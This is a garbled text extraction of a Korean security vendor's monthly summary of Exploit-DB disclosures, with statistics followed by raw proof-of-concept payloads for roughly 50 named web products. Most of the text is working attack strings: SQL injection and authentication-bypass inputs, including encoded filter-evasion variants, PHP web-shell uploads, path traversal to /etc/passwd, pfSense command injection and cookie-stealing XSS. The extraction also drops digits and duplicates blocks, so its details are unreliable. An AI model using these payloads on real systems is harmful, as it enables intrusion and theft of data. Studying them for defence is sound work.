EDB 분석보고서 (208.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection Smart Google Code Inserter < 3.5 P

Size: px

Start display at page:

Download "EDB 분석보고서 (208.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection Smart Google Code Inserter < 3.5 P"

규채 사
5 years ago
Views:

1 EDB 분석보고서 (208.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 208 년 월 EDB 분석보고서에공개된취약점은모두 50 개입니다. 이가장많은수의취약점이공개된공격은 SQL Injection 입니다. 특히공격난이도와위험도가모두 ' ' 인공격또한 SQL Injection 입니다. 모두 ' ' 인 SQL Injection 케이스 "Advantech WebAccess < 8.3 " 취약점은 URL 경로간에공격코드가삽입되는특이한취약점입니다. 해당취약점을포함여 EDB 분석보고서에공개된취약점에대해예방기위해서최신패치와시큐어코딩을권장합니다. 지만완벽한시큐어코딩은불가능며, 지속적으로보안성을유지기위해서웹방화벽을활용한심층방어 (Defense indepth) 구현을고려해야합니다.. 취약점별보고개수 취약점 보고개수 File Upload 2 Command Injection 3 5 XSS 8 SQL Injection 취약점별보고개수 총합계 File Upload Command Injection XSS SQL Injection 총합계 2. 위험도별분류 위험도 보고개수 백분율 % % 위험도별분류 % 총합계 % 0 3. 공격난이도별현황 공격난이도 보고개수 백분율 % % % 총합계 % 주요소프트웨어별취약점발생현황 소프트웨어이름 보고개수 4 CentOS Web 3 2 Local 2 PACSOne Server 2 Easy Car 204 Joomla! Component Picture Calendar for Joomla Quickad Gespage EMC xpression Worpress Service Finder Booking Zechat Photos in Wifi LearnDash Smart Google Code Inserter Muviko Buddy Zone Events Calendar Joomla! Component Visual Calendar Shopware LiveCRM SaaS Cloud SAP NetWeaver J2EE Engine Affiligator Xnami Wchat pfsense Tumder ImgHosting Flexible Poll Domains & Hostings Manager Learning Management System RISE Task Rabbit Clone ILIAS Multilanguage Real Estate MLM Flash Operator Advantech WebAccess Zomato Clone Joomla! Component CP Event Calendar Reservo Image Hosting Hot s Clone SugarCRM 총합계 50 공격난이도별현황 주요소프트웨어별취약점발생현황 CentOS Web Local PACSOne Server Easy Car 204 Joomla! Component Picture Calendar for Joomla Quickad Gespage EMC xpression

2 EDB 분석보고서 (208.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection Smart Google Code Inserter < 3.5 POST /wp-admin/options-general.php?page=smartcode HTTP/. POST /wp-admin/options-general.php?page=smartcode HTTP/. action=saveadwords&delconf=&oid[]= OR =-- &ppccap[]=ex:mywplead&ppcpageid[]=&ppccode[]=bb&nchkdel=o n Smart Smart Google Code Google Code Inserter Inserter < SQL Injection EMC xpression 4.5SP Patch 3 - 'model.jobhistoryid' SQL Injection /xdashboard/html/jobhistory/jobdochistorylist.action?model. jobhistoryid= and =2 EMC xpression EMC xpression 4.5SP Patch 3 POST /gespage/webapp/users/prnow.jsp HTTP/ SQL Injection Gespage show_prn=');select PG_SLEEP(3)-- POST /ges/webapp/users/blhistory.jsp HTTP/. Gespage Gespage show_month=');select PG_SLEEP(3) Photos in Wifi.0. - Path /asset.php?id=40c9c b-4cb8-b848-59a30aa9cf3b&ext=[../not_allowed_directory/].[ext] Photos in Wifi Photos in Wifi.0. POST / HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.2; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary= dd f File Upload LearnDash Arbitrary File Upload dd f2 Content-Disposition: form-data; name="uploadfiles[]"; filename="@./shell.php.php Content-Type: application/octet-stream <?php echo exec("ls -la /etc/passwd"); dd f2-- Content-Disposition: form-data; name="post" LearnDash LearnDash foobar dd f2-- Content-Disposition: form-data; name="course_id" foobar dd f2-- Content-Disposition: form-data; name="course_id" foobar dd f SQL Injection < POST /photo/include/blog/label.php HTTP/. < action=get_article_label&article_id=; SELECT version(); < POST /photo/include/file_upload.php?dir=2f2e2e2f f72 652f50686f7 HTTP/. < action=aviary_add&url=file:///etc/passwd Worpress Service Finder Booking < Local File Disclosure /wp-content/plugins/sfbooking/lib/downloads.php?file=/etc/passwd Worpress Service Finder Booking Worpress Service Finder Booking < 3.2

3 EDB 분석보고서 (208.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다. POST /login.php HTTP/ SQL Injection Muviko. b'&password=admxn&login= Muviko Muviko. 추가적인참고정보 # SQL Injection: load_season.php form parameter [GET] season_id # SQL Injection get_raring.php parameter [GET] movie_id # SQL Injection update_rating.php parameters [GET] rating,movie_id # SQL Injection set_player_source.php parameters [GET] id SQL Injection Events Calendar - 'event_id' SQL Injection /event.php?event_id=- 23%20union%20all%20select%20,2,@@version,4,5,6,7,8,9,0, Events Calendar,2,3,4,5,6,7,8,9,20,2,22,23,24,25,26,27,28,29-- Events Calendar POST /UDDISecurityService/UDDISecurityImplBean HTTP/ SQL Injection SAP NetWeaver J2EE Engine 7.40 <soapenv:envelope xmlns:soapenv=" xmlns:sec=" <soapenv:header/> <soapenv:body> <sec:deletepermissionbyid> <permissionid>' AND =(select COUNT(*) from J2EE_CONFIGENTRY, UME_STRINGS where UME_STRINGS.PID like '%PRIVATE_DATASOURCE.un:Administrator%' and UME_STRINGS.VAL like '%SHA-52%') AND ''='</permissionid> </sec:deletepermissionbyid> </soapenv:body> </soapenv:envelope> SAP NetWeaver J2EE Engine SAP NetWeaver J2EE Engine XSS Xnami.0 - Cross -Site ing POST /media/ajax HTTP/. Xnami Xnami.0 method=addcomment&comment="><iframe SRC=# onmouseover="alert(document.cookie)"></iframe>&mediaid= Command Injection pfsense < 'status_rrd_graph_img.php' Command Injection /status_rrd_graph_img.php?database=queues;+printf+'ls - al'+'sh' pfsense pfsense < XSS ImgHosting.5 /?search="><script>confirm(document.domain)<%2fscript> ImgHosting ImgHosting SQL Injection Domains & Hostings Manager PRO Authentication Bypass POST /dhrpro_demo/login.php HTTP/. Domains & Hostings Manager Domains & Hostings Manager PRO 3.0 accusername=admin%27+or+%27%27%3d%27&accuserpassword=admi n%27+or+%27%27%3d%27&login=+enter SQL Injection RISE.9 - 'search' SQL Injection POST /index.php/knowledge_base/get_article_suggestion/ HTTP/. RISE RISE.9 search=product'%20and%20(select*from(select(sleep(20)))a)-- % Command Injection Command Injection ILIAS < Flash Operator Command Execution /setup/setup.php?cmd="><script>alert()</script> /ucp/index.php?quietmode=337&module=callforward&command=./ &ls -al ILIAS Flash Operator ILIAS < Flash Operator POST /demo/foodpanda/myacount.php HTTP/. User-Agent: Mozilla/5.0 (Windows NT 0.0; Win64; x64; rv:57.0) Gecko/20000 Firefox/57.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q =0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Content-Disposition: form-data; name="fname" Content-Disposition: form-data; name="lname" Content-Disposition: form-data; Content-Disposition: form-data; name="phone" 23 Content-Disposition: form-data; name="image"; filename="info.php.jpg" (change extension to.php) Content-Type: image/jpeg

4 EDB 분석보고서 (208.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 File Upload Zomato Clone - Arbitrary File Upload <?php phpinfo();?> Content-Disposition: form-data; name="addr" Zomato Clone Zomato Clone Content-Disposition: form-data; name="addr2" Content-Disposition: form-data; name="post" Content-Disposition: form-data; name="country" Content-Disposition: form-data; name="state" 3945 Content-Disposition: form-data; name="city" 635 Content-Disposition: form-data; name="location" Content-Disposition: form-data; name="update" Upload XSS Reservo Image Hosting.5 /search/?s=image&t=%27%29%3b%2522%2520style%253d%22%3cscrip t%3ealert%28%29%3c%2fscript%3e%3c Reservo Image Hosting Reservo Image Hosting XSS SugarCRM 3.5. /index.php?action=login&module=users&print=a&"/><script>ale rt('xss')</script> SugarCRM SugarCRM 3.5. /index.php?action=login&module=users&print=a&"/><script>ale rt('xss')</script> POST /backend/customer/ HTTP/ XSS Shopware 5.2.5/5.3 {"id":22,"groupkey":"ek"," ":"test@test.de","active":tr ue,"accountmode":0,"confirmationkey": "","paymentid":5,"firstlogin":" T00:00:00","lastLogin":" T7:22:23","newsletter":0,"validation":0," languageid":,"shopid":,"pricegroupid":0, "internalcomment":"testcomment","failedlogins":0,"referer":"","default_billing_add ress_id":22," default_shipping_address_id":22, "newpassword":"","amount":402.9,"ordercount":,"canceledord eramount": 0,"shopName":"Hauptshop Deutsch","language":"Deutsch","birthday":" ","titl e":""," salutation":"mr","firstname":"test[injected SCRIPT CODE]>"<iframe src=./evi.source onload=alert(document.cookie) <"," Shopware Shopware 5.2.5/5.3 lastname":"test[injected SCRIPT CODE]>"<iframe "number":"20028","billing":[{"id":22,"salutation":"mr","com pany":""," department":"","firstname":"test[injected SCRIPT CODE]>"<iframe src=./evi.source onload=alert (document.cookie) <","title":"","lastname":"test[injected SCRIPT CODE]>"<iframe src=./evi.source onload=alert(document.cookie) <",,"additionaladdressline":"","additionaladdressline2":"", "salutationsnippet":"herr","countryid":2,"number":"","phone ":"","vat Id":"","stateId":null}],"shipping":[{"id":23,"salutation":" mr","company":"","department":"", "firstname":"test[injected SCRIPT CODE]>"<iframe src=./evi.source onload=alert(document.cookie) <","title":"", "lastname":"test[injected SCRIPT CODE]>"<iframe,"additionalAddressLine":"", "additionaladdressline2":"","salutationsnippet":"herr","cou ntryid":2,"stateid":null}],"debit": [],"paymentdata":[{"accountnumber":"","bankcode":"","bankna me":"","accountholder":"","bic":"", "iban":"","usebillingdata":false,"id":null}]} /index.php?action=login&module=users&print=a&"/><script>ale rt('xss')</script> POST /backend/customer/ HTTP/.

5 EDB 분석보고서 (208.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 XSS CentOS Web ue,"accountmode":0,"confirmationkey": "","paymentid":5,"firstlogin":" T00:00:00","lastLogin":" T7:22:23","newsletter":0,"validation":0," languageid":,"shopid":,"pricegroupid":0, "internalcomment":"testcomment","failedlogins":0,"referer":"","default_billing_add ress_id":22," default_shipping_address_id":22, "newpassword":"","amount":402.9,"ordercount":,"canceledord eramount": 0,"shopName":"Hauptshop Deutsch","language":"Deutsch","birthday":" ","titl e":""," salutation":"mr","firstname":"test[injected SCRIPT CODE]>"<iframe src=./evi.source onload=alert(document.cookie) <"," lastname":"test[injected SCRIPT CODE]>"<iframe "number":"20028","billing":[{"id":22,"salutation":"mr","com pany":""," CentOS Web CentOS Web department":"","firstname":"test[injected SCRIPT CODE]>"<iframe src=./evi.source onload=alert (document.cookie) <","title":"","lastname":"test[injected SCRIPT CODE]>"<iframe src=./evi.source onload=alert(document.cookie) <",,"additionaladdressline":"","additionaladdressline2":"", "salutationsnippet":"herr","countryid":2,"number":"","phone ":"","vat Id":"","stateId":null}],"shipping":[{"id":23,"salutation":" mr","company":"","department":"", "firstname":"test[injected SCRIPT CODE]>"<iframe src=./evi.source onload=alert(document.cookie) <","title":"", "lastname":"test[injected SCRIPT CODE]>"<iframe,"additionalAddressLine":"", "additionaladdressline2":"","salutationsnippet":"herr","cou ntryid":2,"stateid":null}],"debit": [],"paymentdata":[{"accountnumber":"","bankcode":"","bankna me":"","accountholder":"","bic":"", "iban":"","usebillingdata":false,"id":null}]} XSS CentOS Web POST /index.php?module=mail_add-new HTTP/. CentOS Web CentOS Web ifpost=yes& _address="><iframe SRC=# onmouseover="alert(document.cookie)"></iframe>&domain=domain.com&password="><iframe SRC=# onmouseover="alert(document.cookie)"></iframe> XSS CentOS Web 'row_id' / 'domain' SQL Injection POST /index.php?module=list_domains HTTP/. CentOS Web CentOS Web ifpost=yes&username=&domain=' or =--&row_id=' or = SQL Injection LiveCRM SaaS Cloud.0 /livecrm/web/index.php?r=site/login&company_id=%3%20%4f%52 %20%3%20%47%52%4f%55%50%20%42%59%20%43%4f%4e%43%4%54%5f%5 7%53%28%30%78%33%6%2c%56%45%52%53%49%4f%4e%28%29%2c%46%4c% 4f%4f%52%28%52%4%4e%44%28%30%29%2a%32%29%29%20%48%4%56%49 %4e%47%20%4d%49%4e%28%30%29%20%4f%52%20%3 LiveCRM SaaS Cloud LiveCRM SaaS Cloud SQL Injection Affiligator 2..0 /search/?q=&price_type=range&price=%3%30%30%20%6%6e%64%28 %73%65%6c%65%63%74%2%56%65%72%4%79%6%72%69%2d%7e%30%2e%2 0%66%72%6f%6d%28%73%65%6c%65%63%74%28%73%65%6c%65%63%74%20% 67%72%6f%75%70%5f%63%6f%6e%63%6%74%28%56%65%72%73%69%6f%6e %28%29%29%29%79%29%78%29 Affiligator Affiligator SQL Injection Easy Car 204 /site_search.php?s_vehicletype=auto&s_order=[sql]&s_row=%35 %3%20%2f%2a%2%30%35%35%35%35%50%72%6f%63%65%64%75%72%65%2 a%2f%20%2f%2a%2%30%35%35%35%35%4%6e%6%6c%79%73%65%2a%2f% 20%28%65%78%74%72%6%63%74%76%6%6c%75%65%28%30%2c%2f%2a%2 %30%35%35%35%35%63%6f%6e%63%6%74%2a%2f%28%30%78%32%37%2c%3 0%78%33%6%2c%40%40%76%65%72%73%69%6f%6e%2c%64%6%74%6%62% 6%73%65%28%29%29%29%2c%30%29%2d%2d%20%2d Easy Car 204 Easy Car SQL Injection Wchat.5 POST /login.php HTTP/. Wchat Wchat.5 User=' UNION ALL SELECT 0x3,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),0x33,0 x34--& Pass=anything SQL Injection Zechat.5 POST /login.php HTTP/. Zechat Zechat.5 User=' UNION ALL SELECT 0x3,0x32,0x33,concat(0x63)--& Pass=anything

6 EDB 분석보고서 (208.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection Tumder 2. /category/%2d%33%20%20%2f%2a%2%30%3%3%3%3%55%4e%49%4f% 4e%2a%2f%20%2f%2a%2%30%3%3%3%3%4%4c%4c%2a%2f%20%2f%2a %2%30%3%3%3%3%53%45%4c%45%43%54%2a%2f%20%30%78%33%3%2 c%30%78%33%32%2c%43%4f%4e%43%4%54%28%44%6%74%6%62%6%73% 65%28%29%2c%56%45%52%53%49%4f%4e%28%29%2c%30%78%37%65%2c%44 %4%54%4%42%4%53%45%28%29%2c%30%78%37%65%2c%55%53%45%52%2 8%29%29%2d%2d%20%2d Tumder Tumder SQL Injection Quickad 4.0 /listing?keywords=' UNION ALL SELECT NULL,CONCAT(version(),0x7e7e,database()),NULL-- gllf&location=all%20united%20states&placetype=country&place id=23[sql]&cat=[sql]&subcat=5[sql]&filter=&sort=newest&sub mit= Quickad Quickad SQL Injection Flexible Poll.2 /mobile_preview.php?id=- 8888select*/+count(*)/*!08888from*/(information_schema.colu Flexible Poll Flexible Poll SQL Injection Local.0 /sellers_subcategories.php?industryid=- 05++/*!08888uNiOn*/(/*!08888SelECt*/+0x ,0x 0,(/*!08888select*/+count(*)/*!08888from*/(information_sche ),0x283629,0x283729)-- Local Local SQL Injection Local.0 /suppliers.php?industryid=[sql]&categoryid=- 05++/*!08888uNiOn*/(/*!08888SelECt*/+0x ,0x 0,(/*!08888select*/+count(*)/*!08888from*/(information_sche ),0x283629,0x283729)-- Local Local SQL Injection Learning Management System - 'course_id' SQL Injection /?type=scoring-status-student&course_id= union+select+,2,3,user()%23 Learning Management System Learning Management System PACSOne Server DICOM Web Viewer - Trasversal /pacs/nocache.php?path=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.i ni /pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..% 2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd PACSOne Server PACSOne Server DICOM Web Viewer SQL Injection PACSOne Server DICOM Web Viewer POST /pacs/usersignup.php HTTP/. hostname=localhost&database=dicom&username= union+select+,2,3,user()%23&password= &first name=&lastname=& = union+select+,2,3,user()%23&action=Sign+Up PACSOne Server PACSOne Server DICOM Web Viewer SQL Injection Task Rabbit Clone.0 - 'id' SQL Injection /pages/single_blog.php?id=%3%20%20%2f%2a%2%3%33%33%33%37 %55%4e%49%4f%4e%2a%2f%20%2f%2a%2%3%33%33%33%37%53%45%4c%4 Task Rabbit Clone 5%43%54%2a%2f%20%3%2c%76%65%72%73%69%6f%6e%28%29%2c%33%2c% 34%2c%35%2c%36%2d%2d%20%2d Task Rabbit Clone SQL Injection.0 POST /index.php HTTP/..0 User=' OR -- -&Pass=bypass SQL Injection.0 /site.php?id=%2d%33%36%34%27%20%20%2f%2a%2%30%38%38%38%38% 55%4e%49%4f%4e%2a%2f%28%2f%2a%2%30%38%38%38%38%53%45%4c%45 %43%54%2a%2f%20%30%78%33%30%37%38%33%32%33%38%33%33%33%3%3 3%32%33%39%2c%30%78%32%38%33%32%32%39%2c%2f%2a%2%30%38%38% 38%38%43%4f%4e%43%4%54%5f%57%53%2a%2f%28%30%78%32%30%33%6 %32%30%2c%55%53%45%52%28%29%2c%44%4%54%4%42%4%53%45%28%2 9%2c%56%45%52%53%49%4f%4e%28%29%29%2c%30%78%34%39%34%38%35% 33%34%3%34%65%32%30%35%33%34%35%34%65%34%33%34%3%34%65%2c %28%2f%2a%2%30%38%38%38%38%53%65%6c%65%63%74%2a%2f%20%65%7 8%70%6f%72%74%5f%73%65%74%28%35%2c%40%3a%3d%30%2c%28%2f%2a% 2%30%38%38%38%38%73%65%6c%65%63%74%2a%2f%20%63%6f%75%6e%74 %28%2a%29%2f%2a%2%30%38%38%38%38%66%72%6f%6d%2a%2f%28%69%6 e%66%6f%72%6d%6%74%69%6f%6e%5f%73%63%68%65%6d%6%2e%63%6f% 6c%75%6d%6e%73%29%77%68%65%72%65%40%3a%3d%65%78%70%6f%72%74 %5f%73%65%74%28%35%2c%65%78%70%6f%72%74%5f%73%65%74%28%35%2 c%40%2c%2f%2a%2%30%38%38%38%38%74%6%62%6c%65%5f%6e%6%6d% 65%2a%2f%2c%30%78%33%63%36%63%36%39%33%65%2c%32%29%2c%2f%2a %2%30%38%38%38%38%63%6f%6c%75%6d%6e%5f%6e%6%6d%65%2a%2f%2 c%30%78%6%33%6%2c%32%29%29%2c%40%2c%32%29%29%2c%30%78%33% 30%37%38%33%32%33%38%33%33%33%36%33%32%33%39%2c%30%78%32%38 %33%37%32%39%2c%30%78%32%38%33%38%32%39%29%2d%2d%20%2d SQL Injection.0 /pagelist.php?id=%2d%33%36%34%27%20%20%2f%2a%2%30%38%38%38 %38%55%4e%49%4f%4e%2a%2f%28%2f%2a%2%30%38%38%38%38%53%45%4 c%45%43%54%2a%2f%20%30%78%33%30%37%38%33%32%33%38%33%33%33% 3%33%32%33%39%2c%30%78%32%38%33%32%32%39%2c%2f%2a%2%30%38 %38%38%38%43%4f%4e%43%4%54%5f%57%53%2a%2f%28%30%78%32%30%3 3%6%32%30%2c%55%53%45%52%28%29%2c%44%4%54%4%42%4%53%45% 28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%30%78%34%39%34%38 %35%33%34%3%34%65%32%30%35%33%34%35%34%65%34%33%34%3%34%6 5%2c%28%2f%2a%2%30%38%38%38%38%53%65%6c%65%63%74%2a%2f%20% 65%78%70%6f%72%74%5f%73%65%74%28%35%2c%40%3a%3d%30%2c%28%2f %2a%2%30%38%38%38%38%73%65%6c%65%63%74%2a%2f%20%63%6f%75%6 e%74%28%2a%29%2f%2a%2%30%38%38%38%38%66%72%6f%6d%2a%2f%28% 69%6e%66%6f%72%6d%6%74%69%6f%6e%5f%73%63%68%65%6d%6%2e%63 %6f%6c%75%6d%6e%73%29%77%68%65%72%65%40%3a%3d%65%78%70%6f%7 2%74%5f%73%65%74%28%35%2c%65%78%70%6f%72%74%5f%73%65%74%28% 35%2c%40%2c%2f%2a%2%30%38%38%38%38%74%6%62%6c%65%5f%6e%6 %6d%65%2a%2f%2c%30%78%33%63%36%63%36%39%33%65%2c%32%29%2c%2 f%2a%2%30%38%38%38%38%63%6f%6c%75%6d%6e%5f%6e%6%6d%65%2a% 2f%2c%30%78%6%33%6%2c%32%29%29%2c%40%2c%32%29%29%2c%30%78 %33%30%37%38%33%32%33%38%33%33%33%36%33%32%33%39%2c%30%78%3 2%38%33%37%32%39%2c%30%78%32%38%33%38%32%39%29%2d%2d%20%2d.0

7 EDB 분석보고서 (208.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection.0 /page_new.php?id=%2d%33%36%34%27%20%20%2f%2a%2%30%38%38%38 %38%55%4e%49%4f%4e%2a%2f%28%2f%2a%2%30%38%38%38%38%53%45%4 c%45%43%54%2a%2f%20%30%78%33%30%37%38%33%32%33%38%33%33%33% 3%33%32%33%39%2c%30%78%32%38%33%32%32%39%2c%2f%2a%2%30%38 %38%38%38%43%4f%4e%43%4%54%5f%57%53%2a%2f%28%30%78%32%30%3 3%6%32%30%2c%55%53%45%52%28%29%2c%44%4%54%4%42%4%53%45% 28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%30%78%34%39%34%38 %35%33%34%3%34%65%32%30%35%33%34%35%34%65%34%33%34%3%34%6 5%2c%28%2f%2a%2%30%38%38%38%38%53%65%6c%65%63%74%2a%2f%20% 65%78%70%6f%72%74%5f%73%65%74%28%35%2c%40%3a%3d%30%2c%28%2f %2a%2%30%38%38%38%38%73%65%6c%65%63%74%2a%2f%20%63%6f%75%6 e%74%28%2a%29%2f%2a%2%30%38%38%38%38%66%72%6f%6d%2a%2f%28% 69%6e%66%6f%72%6d%6%74%69%6f%6e%5f%73%63%68%65%6d%6%2e%63 %6f%6c%75%6d%6e%73%29%77%68%65%72%65%40%3a%3d%65%78%70%6f%7 2%74%5f%73%65%74%28%35%2c%65%78%70%6f%72%74%5f%73%65%74%28% 35%2c%40%2c%2f%2a%2%30%38%38%38%38%74%6%62%6c%65%5f%6e%6 %6d%65%2a%2f%2c%30%78%33%63%36%63%36%39%33%65%2c%32%29%2c%2 f%2a%2%30%38%38%38%38%63%6f%6c%75%6d%6e%5f%6e%6%6d%65%2a% 2f%2c%30%78%6%33%6%2c%32%29%29%2c%40%2c%32%29%29%2c%30%78 %33%30%37%38%33%32%33%38%33%33%33%36%33%32%33%39%2c%30%78%3 2%38%33%37%32%39%2c%30%78%32%38%33%38%32%39%29%2d%2d%20%2d SQL Injection Hot s Clone - 'subctid' SQL Injection /categories?keyword=&mctid=[sql]&subctid=- Y2h7890'++/*!08888UNION*/+/*!08888ALL*/+/*!08888SELECT*/+( /*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count( Hot s Clone *)/*!08888from*/(information_schema.columns)where@:=export_ set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*! 08888column_name*/,0xa3a,2)),@,2))--+- Hot s Clone SQL Injection Multilanguage Real Estate MLM 'srch' SQL Injection /productlist.php?srch=%73%66%64%27%29%20%20%2f%2a%2%30%38%38%38%38 %55%4e%49%4f%4e%2a%2f%28%2f%2a%2%30%38%38%38%38%53%45%4c%4 5%43%54%2a%2f%20%28%3%29%2c%28%32%29%2c%43%4f%4e%43%4%54% 5f%57%53%28%30%78%32%30%33%6%32%30%2c%55%53%45%52%28%29%2c %44%4%54%4%42%4%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%2 9%29%2c%28%34%29%29%2d%2d%20%2d Multilanguage Real Estate MLM Multilanguag e Real Estate MLM SQL Injection Buddy Zone /chat_im/chat_window.php?request_id=- 55++/*!3337UNION*/+/*!3337SELECT*/+,(Select+export_set( 5,@:=0,(select+count(*)from(information_schema.columns)wher e@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),co lumn_name,0xa3a,2)),@,2)),3,4,5,6,7,8,9--+- Buddy Zone Buddy Zone SQL Injection Advantech WebAccess < 8.3 /BWMobileService/BWScadaRest.svc/Login/notadmin'%20or%20'x' %3D'x/nopass/ Advantech WebAccess Advantech WebAccess < Joomla! Component Picture Calendar for Joomla /list.php?folder=../../../../etc/passwd Joomla! Component Picture Calendar for Joomla Joomla! Component Picture Calendar for Joomla SQL Injection Joomla! Component CP Event Calendar 'id' SQL Injection /index.php?option=com_cpeventcalendar&task=load&id=%2d%3%2 Joomla! 0%20%2f%2a%2%30%36%36%36%36%55%4e%49%4f%4e%2a%2f%20%2f%2a% Component CP Joomla! Component 2%30%36%36%36%36%53%45%4c%45%43%54%2a%2f%20CONCAT_WS(0x203 Event CP Event Calendar a20,user(),database(),version())%2c%32%2c%33%2c%34%2c%35%2c Calendar %36%2c%37%2d%2d%20%2d SQL Injection Joomla! Component Visual Calendar 'id' SQL Injection /index.php?option=com_visualcalendar&view=load&id=- %20%20/*!06666UNION*/%20/*!06666SELECT*/%20(SELECT(@x)FROM (SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEM A.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d674696f6e5f d6)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b,4,0x30 ),0x3a20,table_name,0x3c62723e))))x)%2c0x32%2c0x33%2c0x34%2 c0x35%2c0x36%2d%2d%20%2d Joomla! Component Visual Calendar Joomla! Component Visual Calendar 3..3

EDB 분석보고서 (04.06) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time-

EDB 분석보고서 (04.06) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time- EDB 분석보고서 (04.06) 04.06.0~04.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 04년 06월에공개된 Exploit-DB의분석결과, SQL 공격에대한보고개수가가장많았습니다. 이와같은결과로부터여전히 SQL 이웹에서가장많이사용되는임을확인할수있습니다.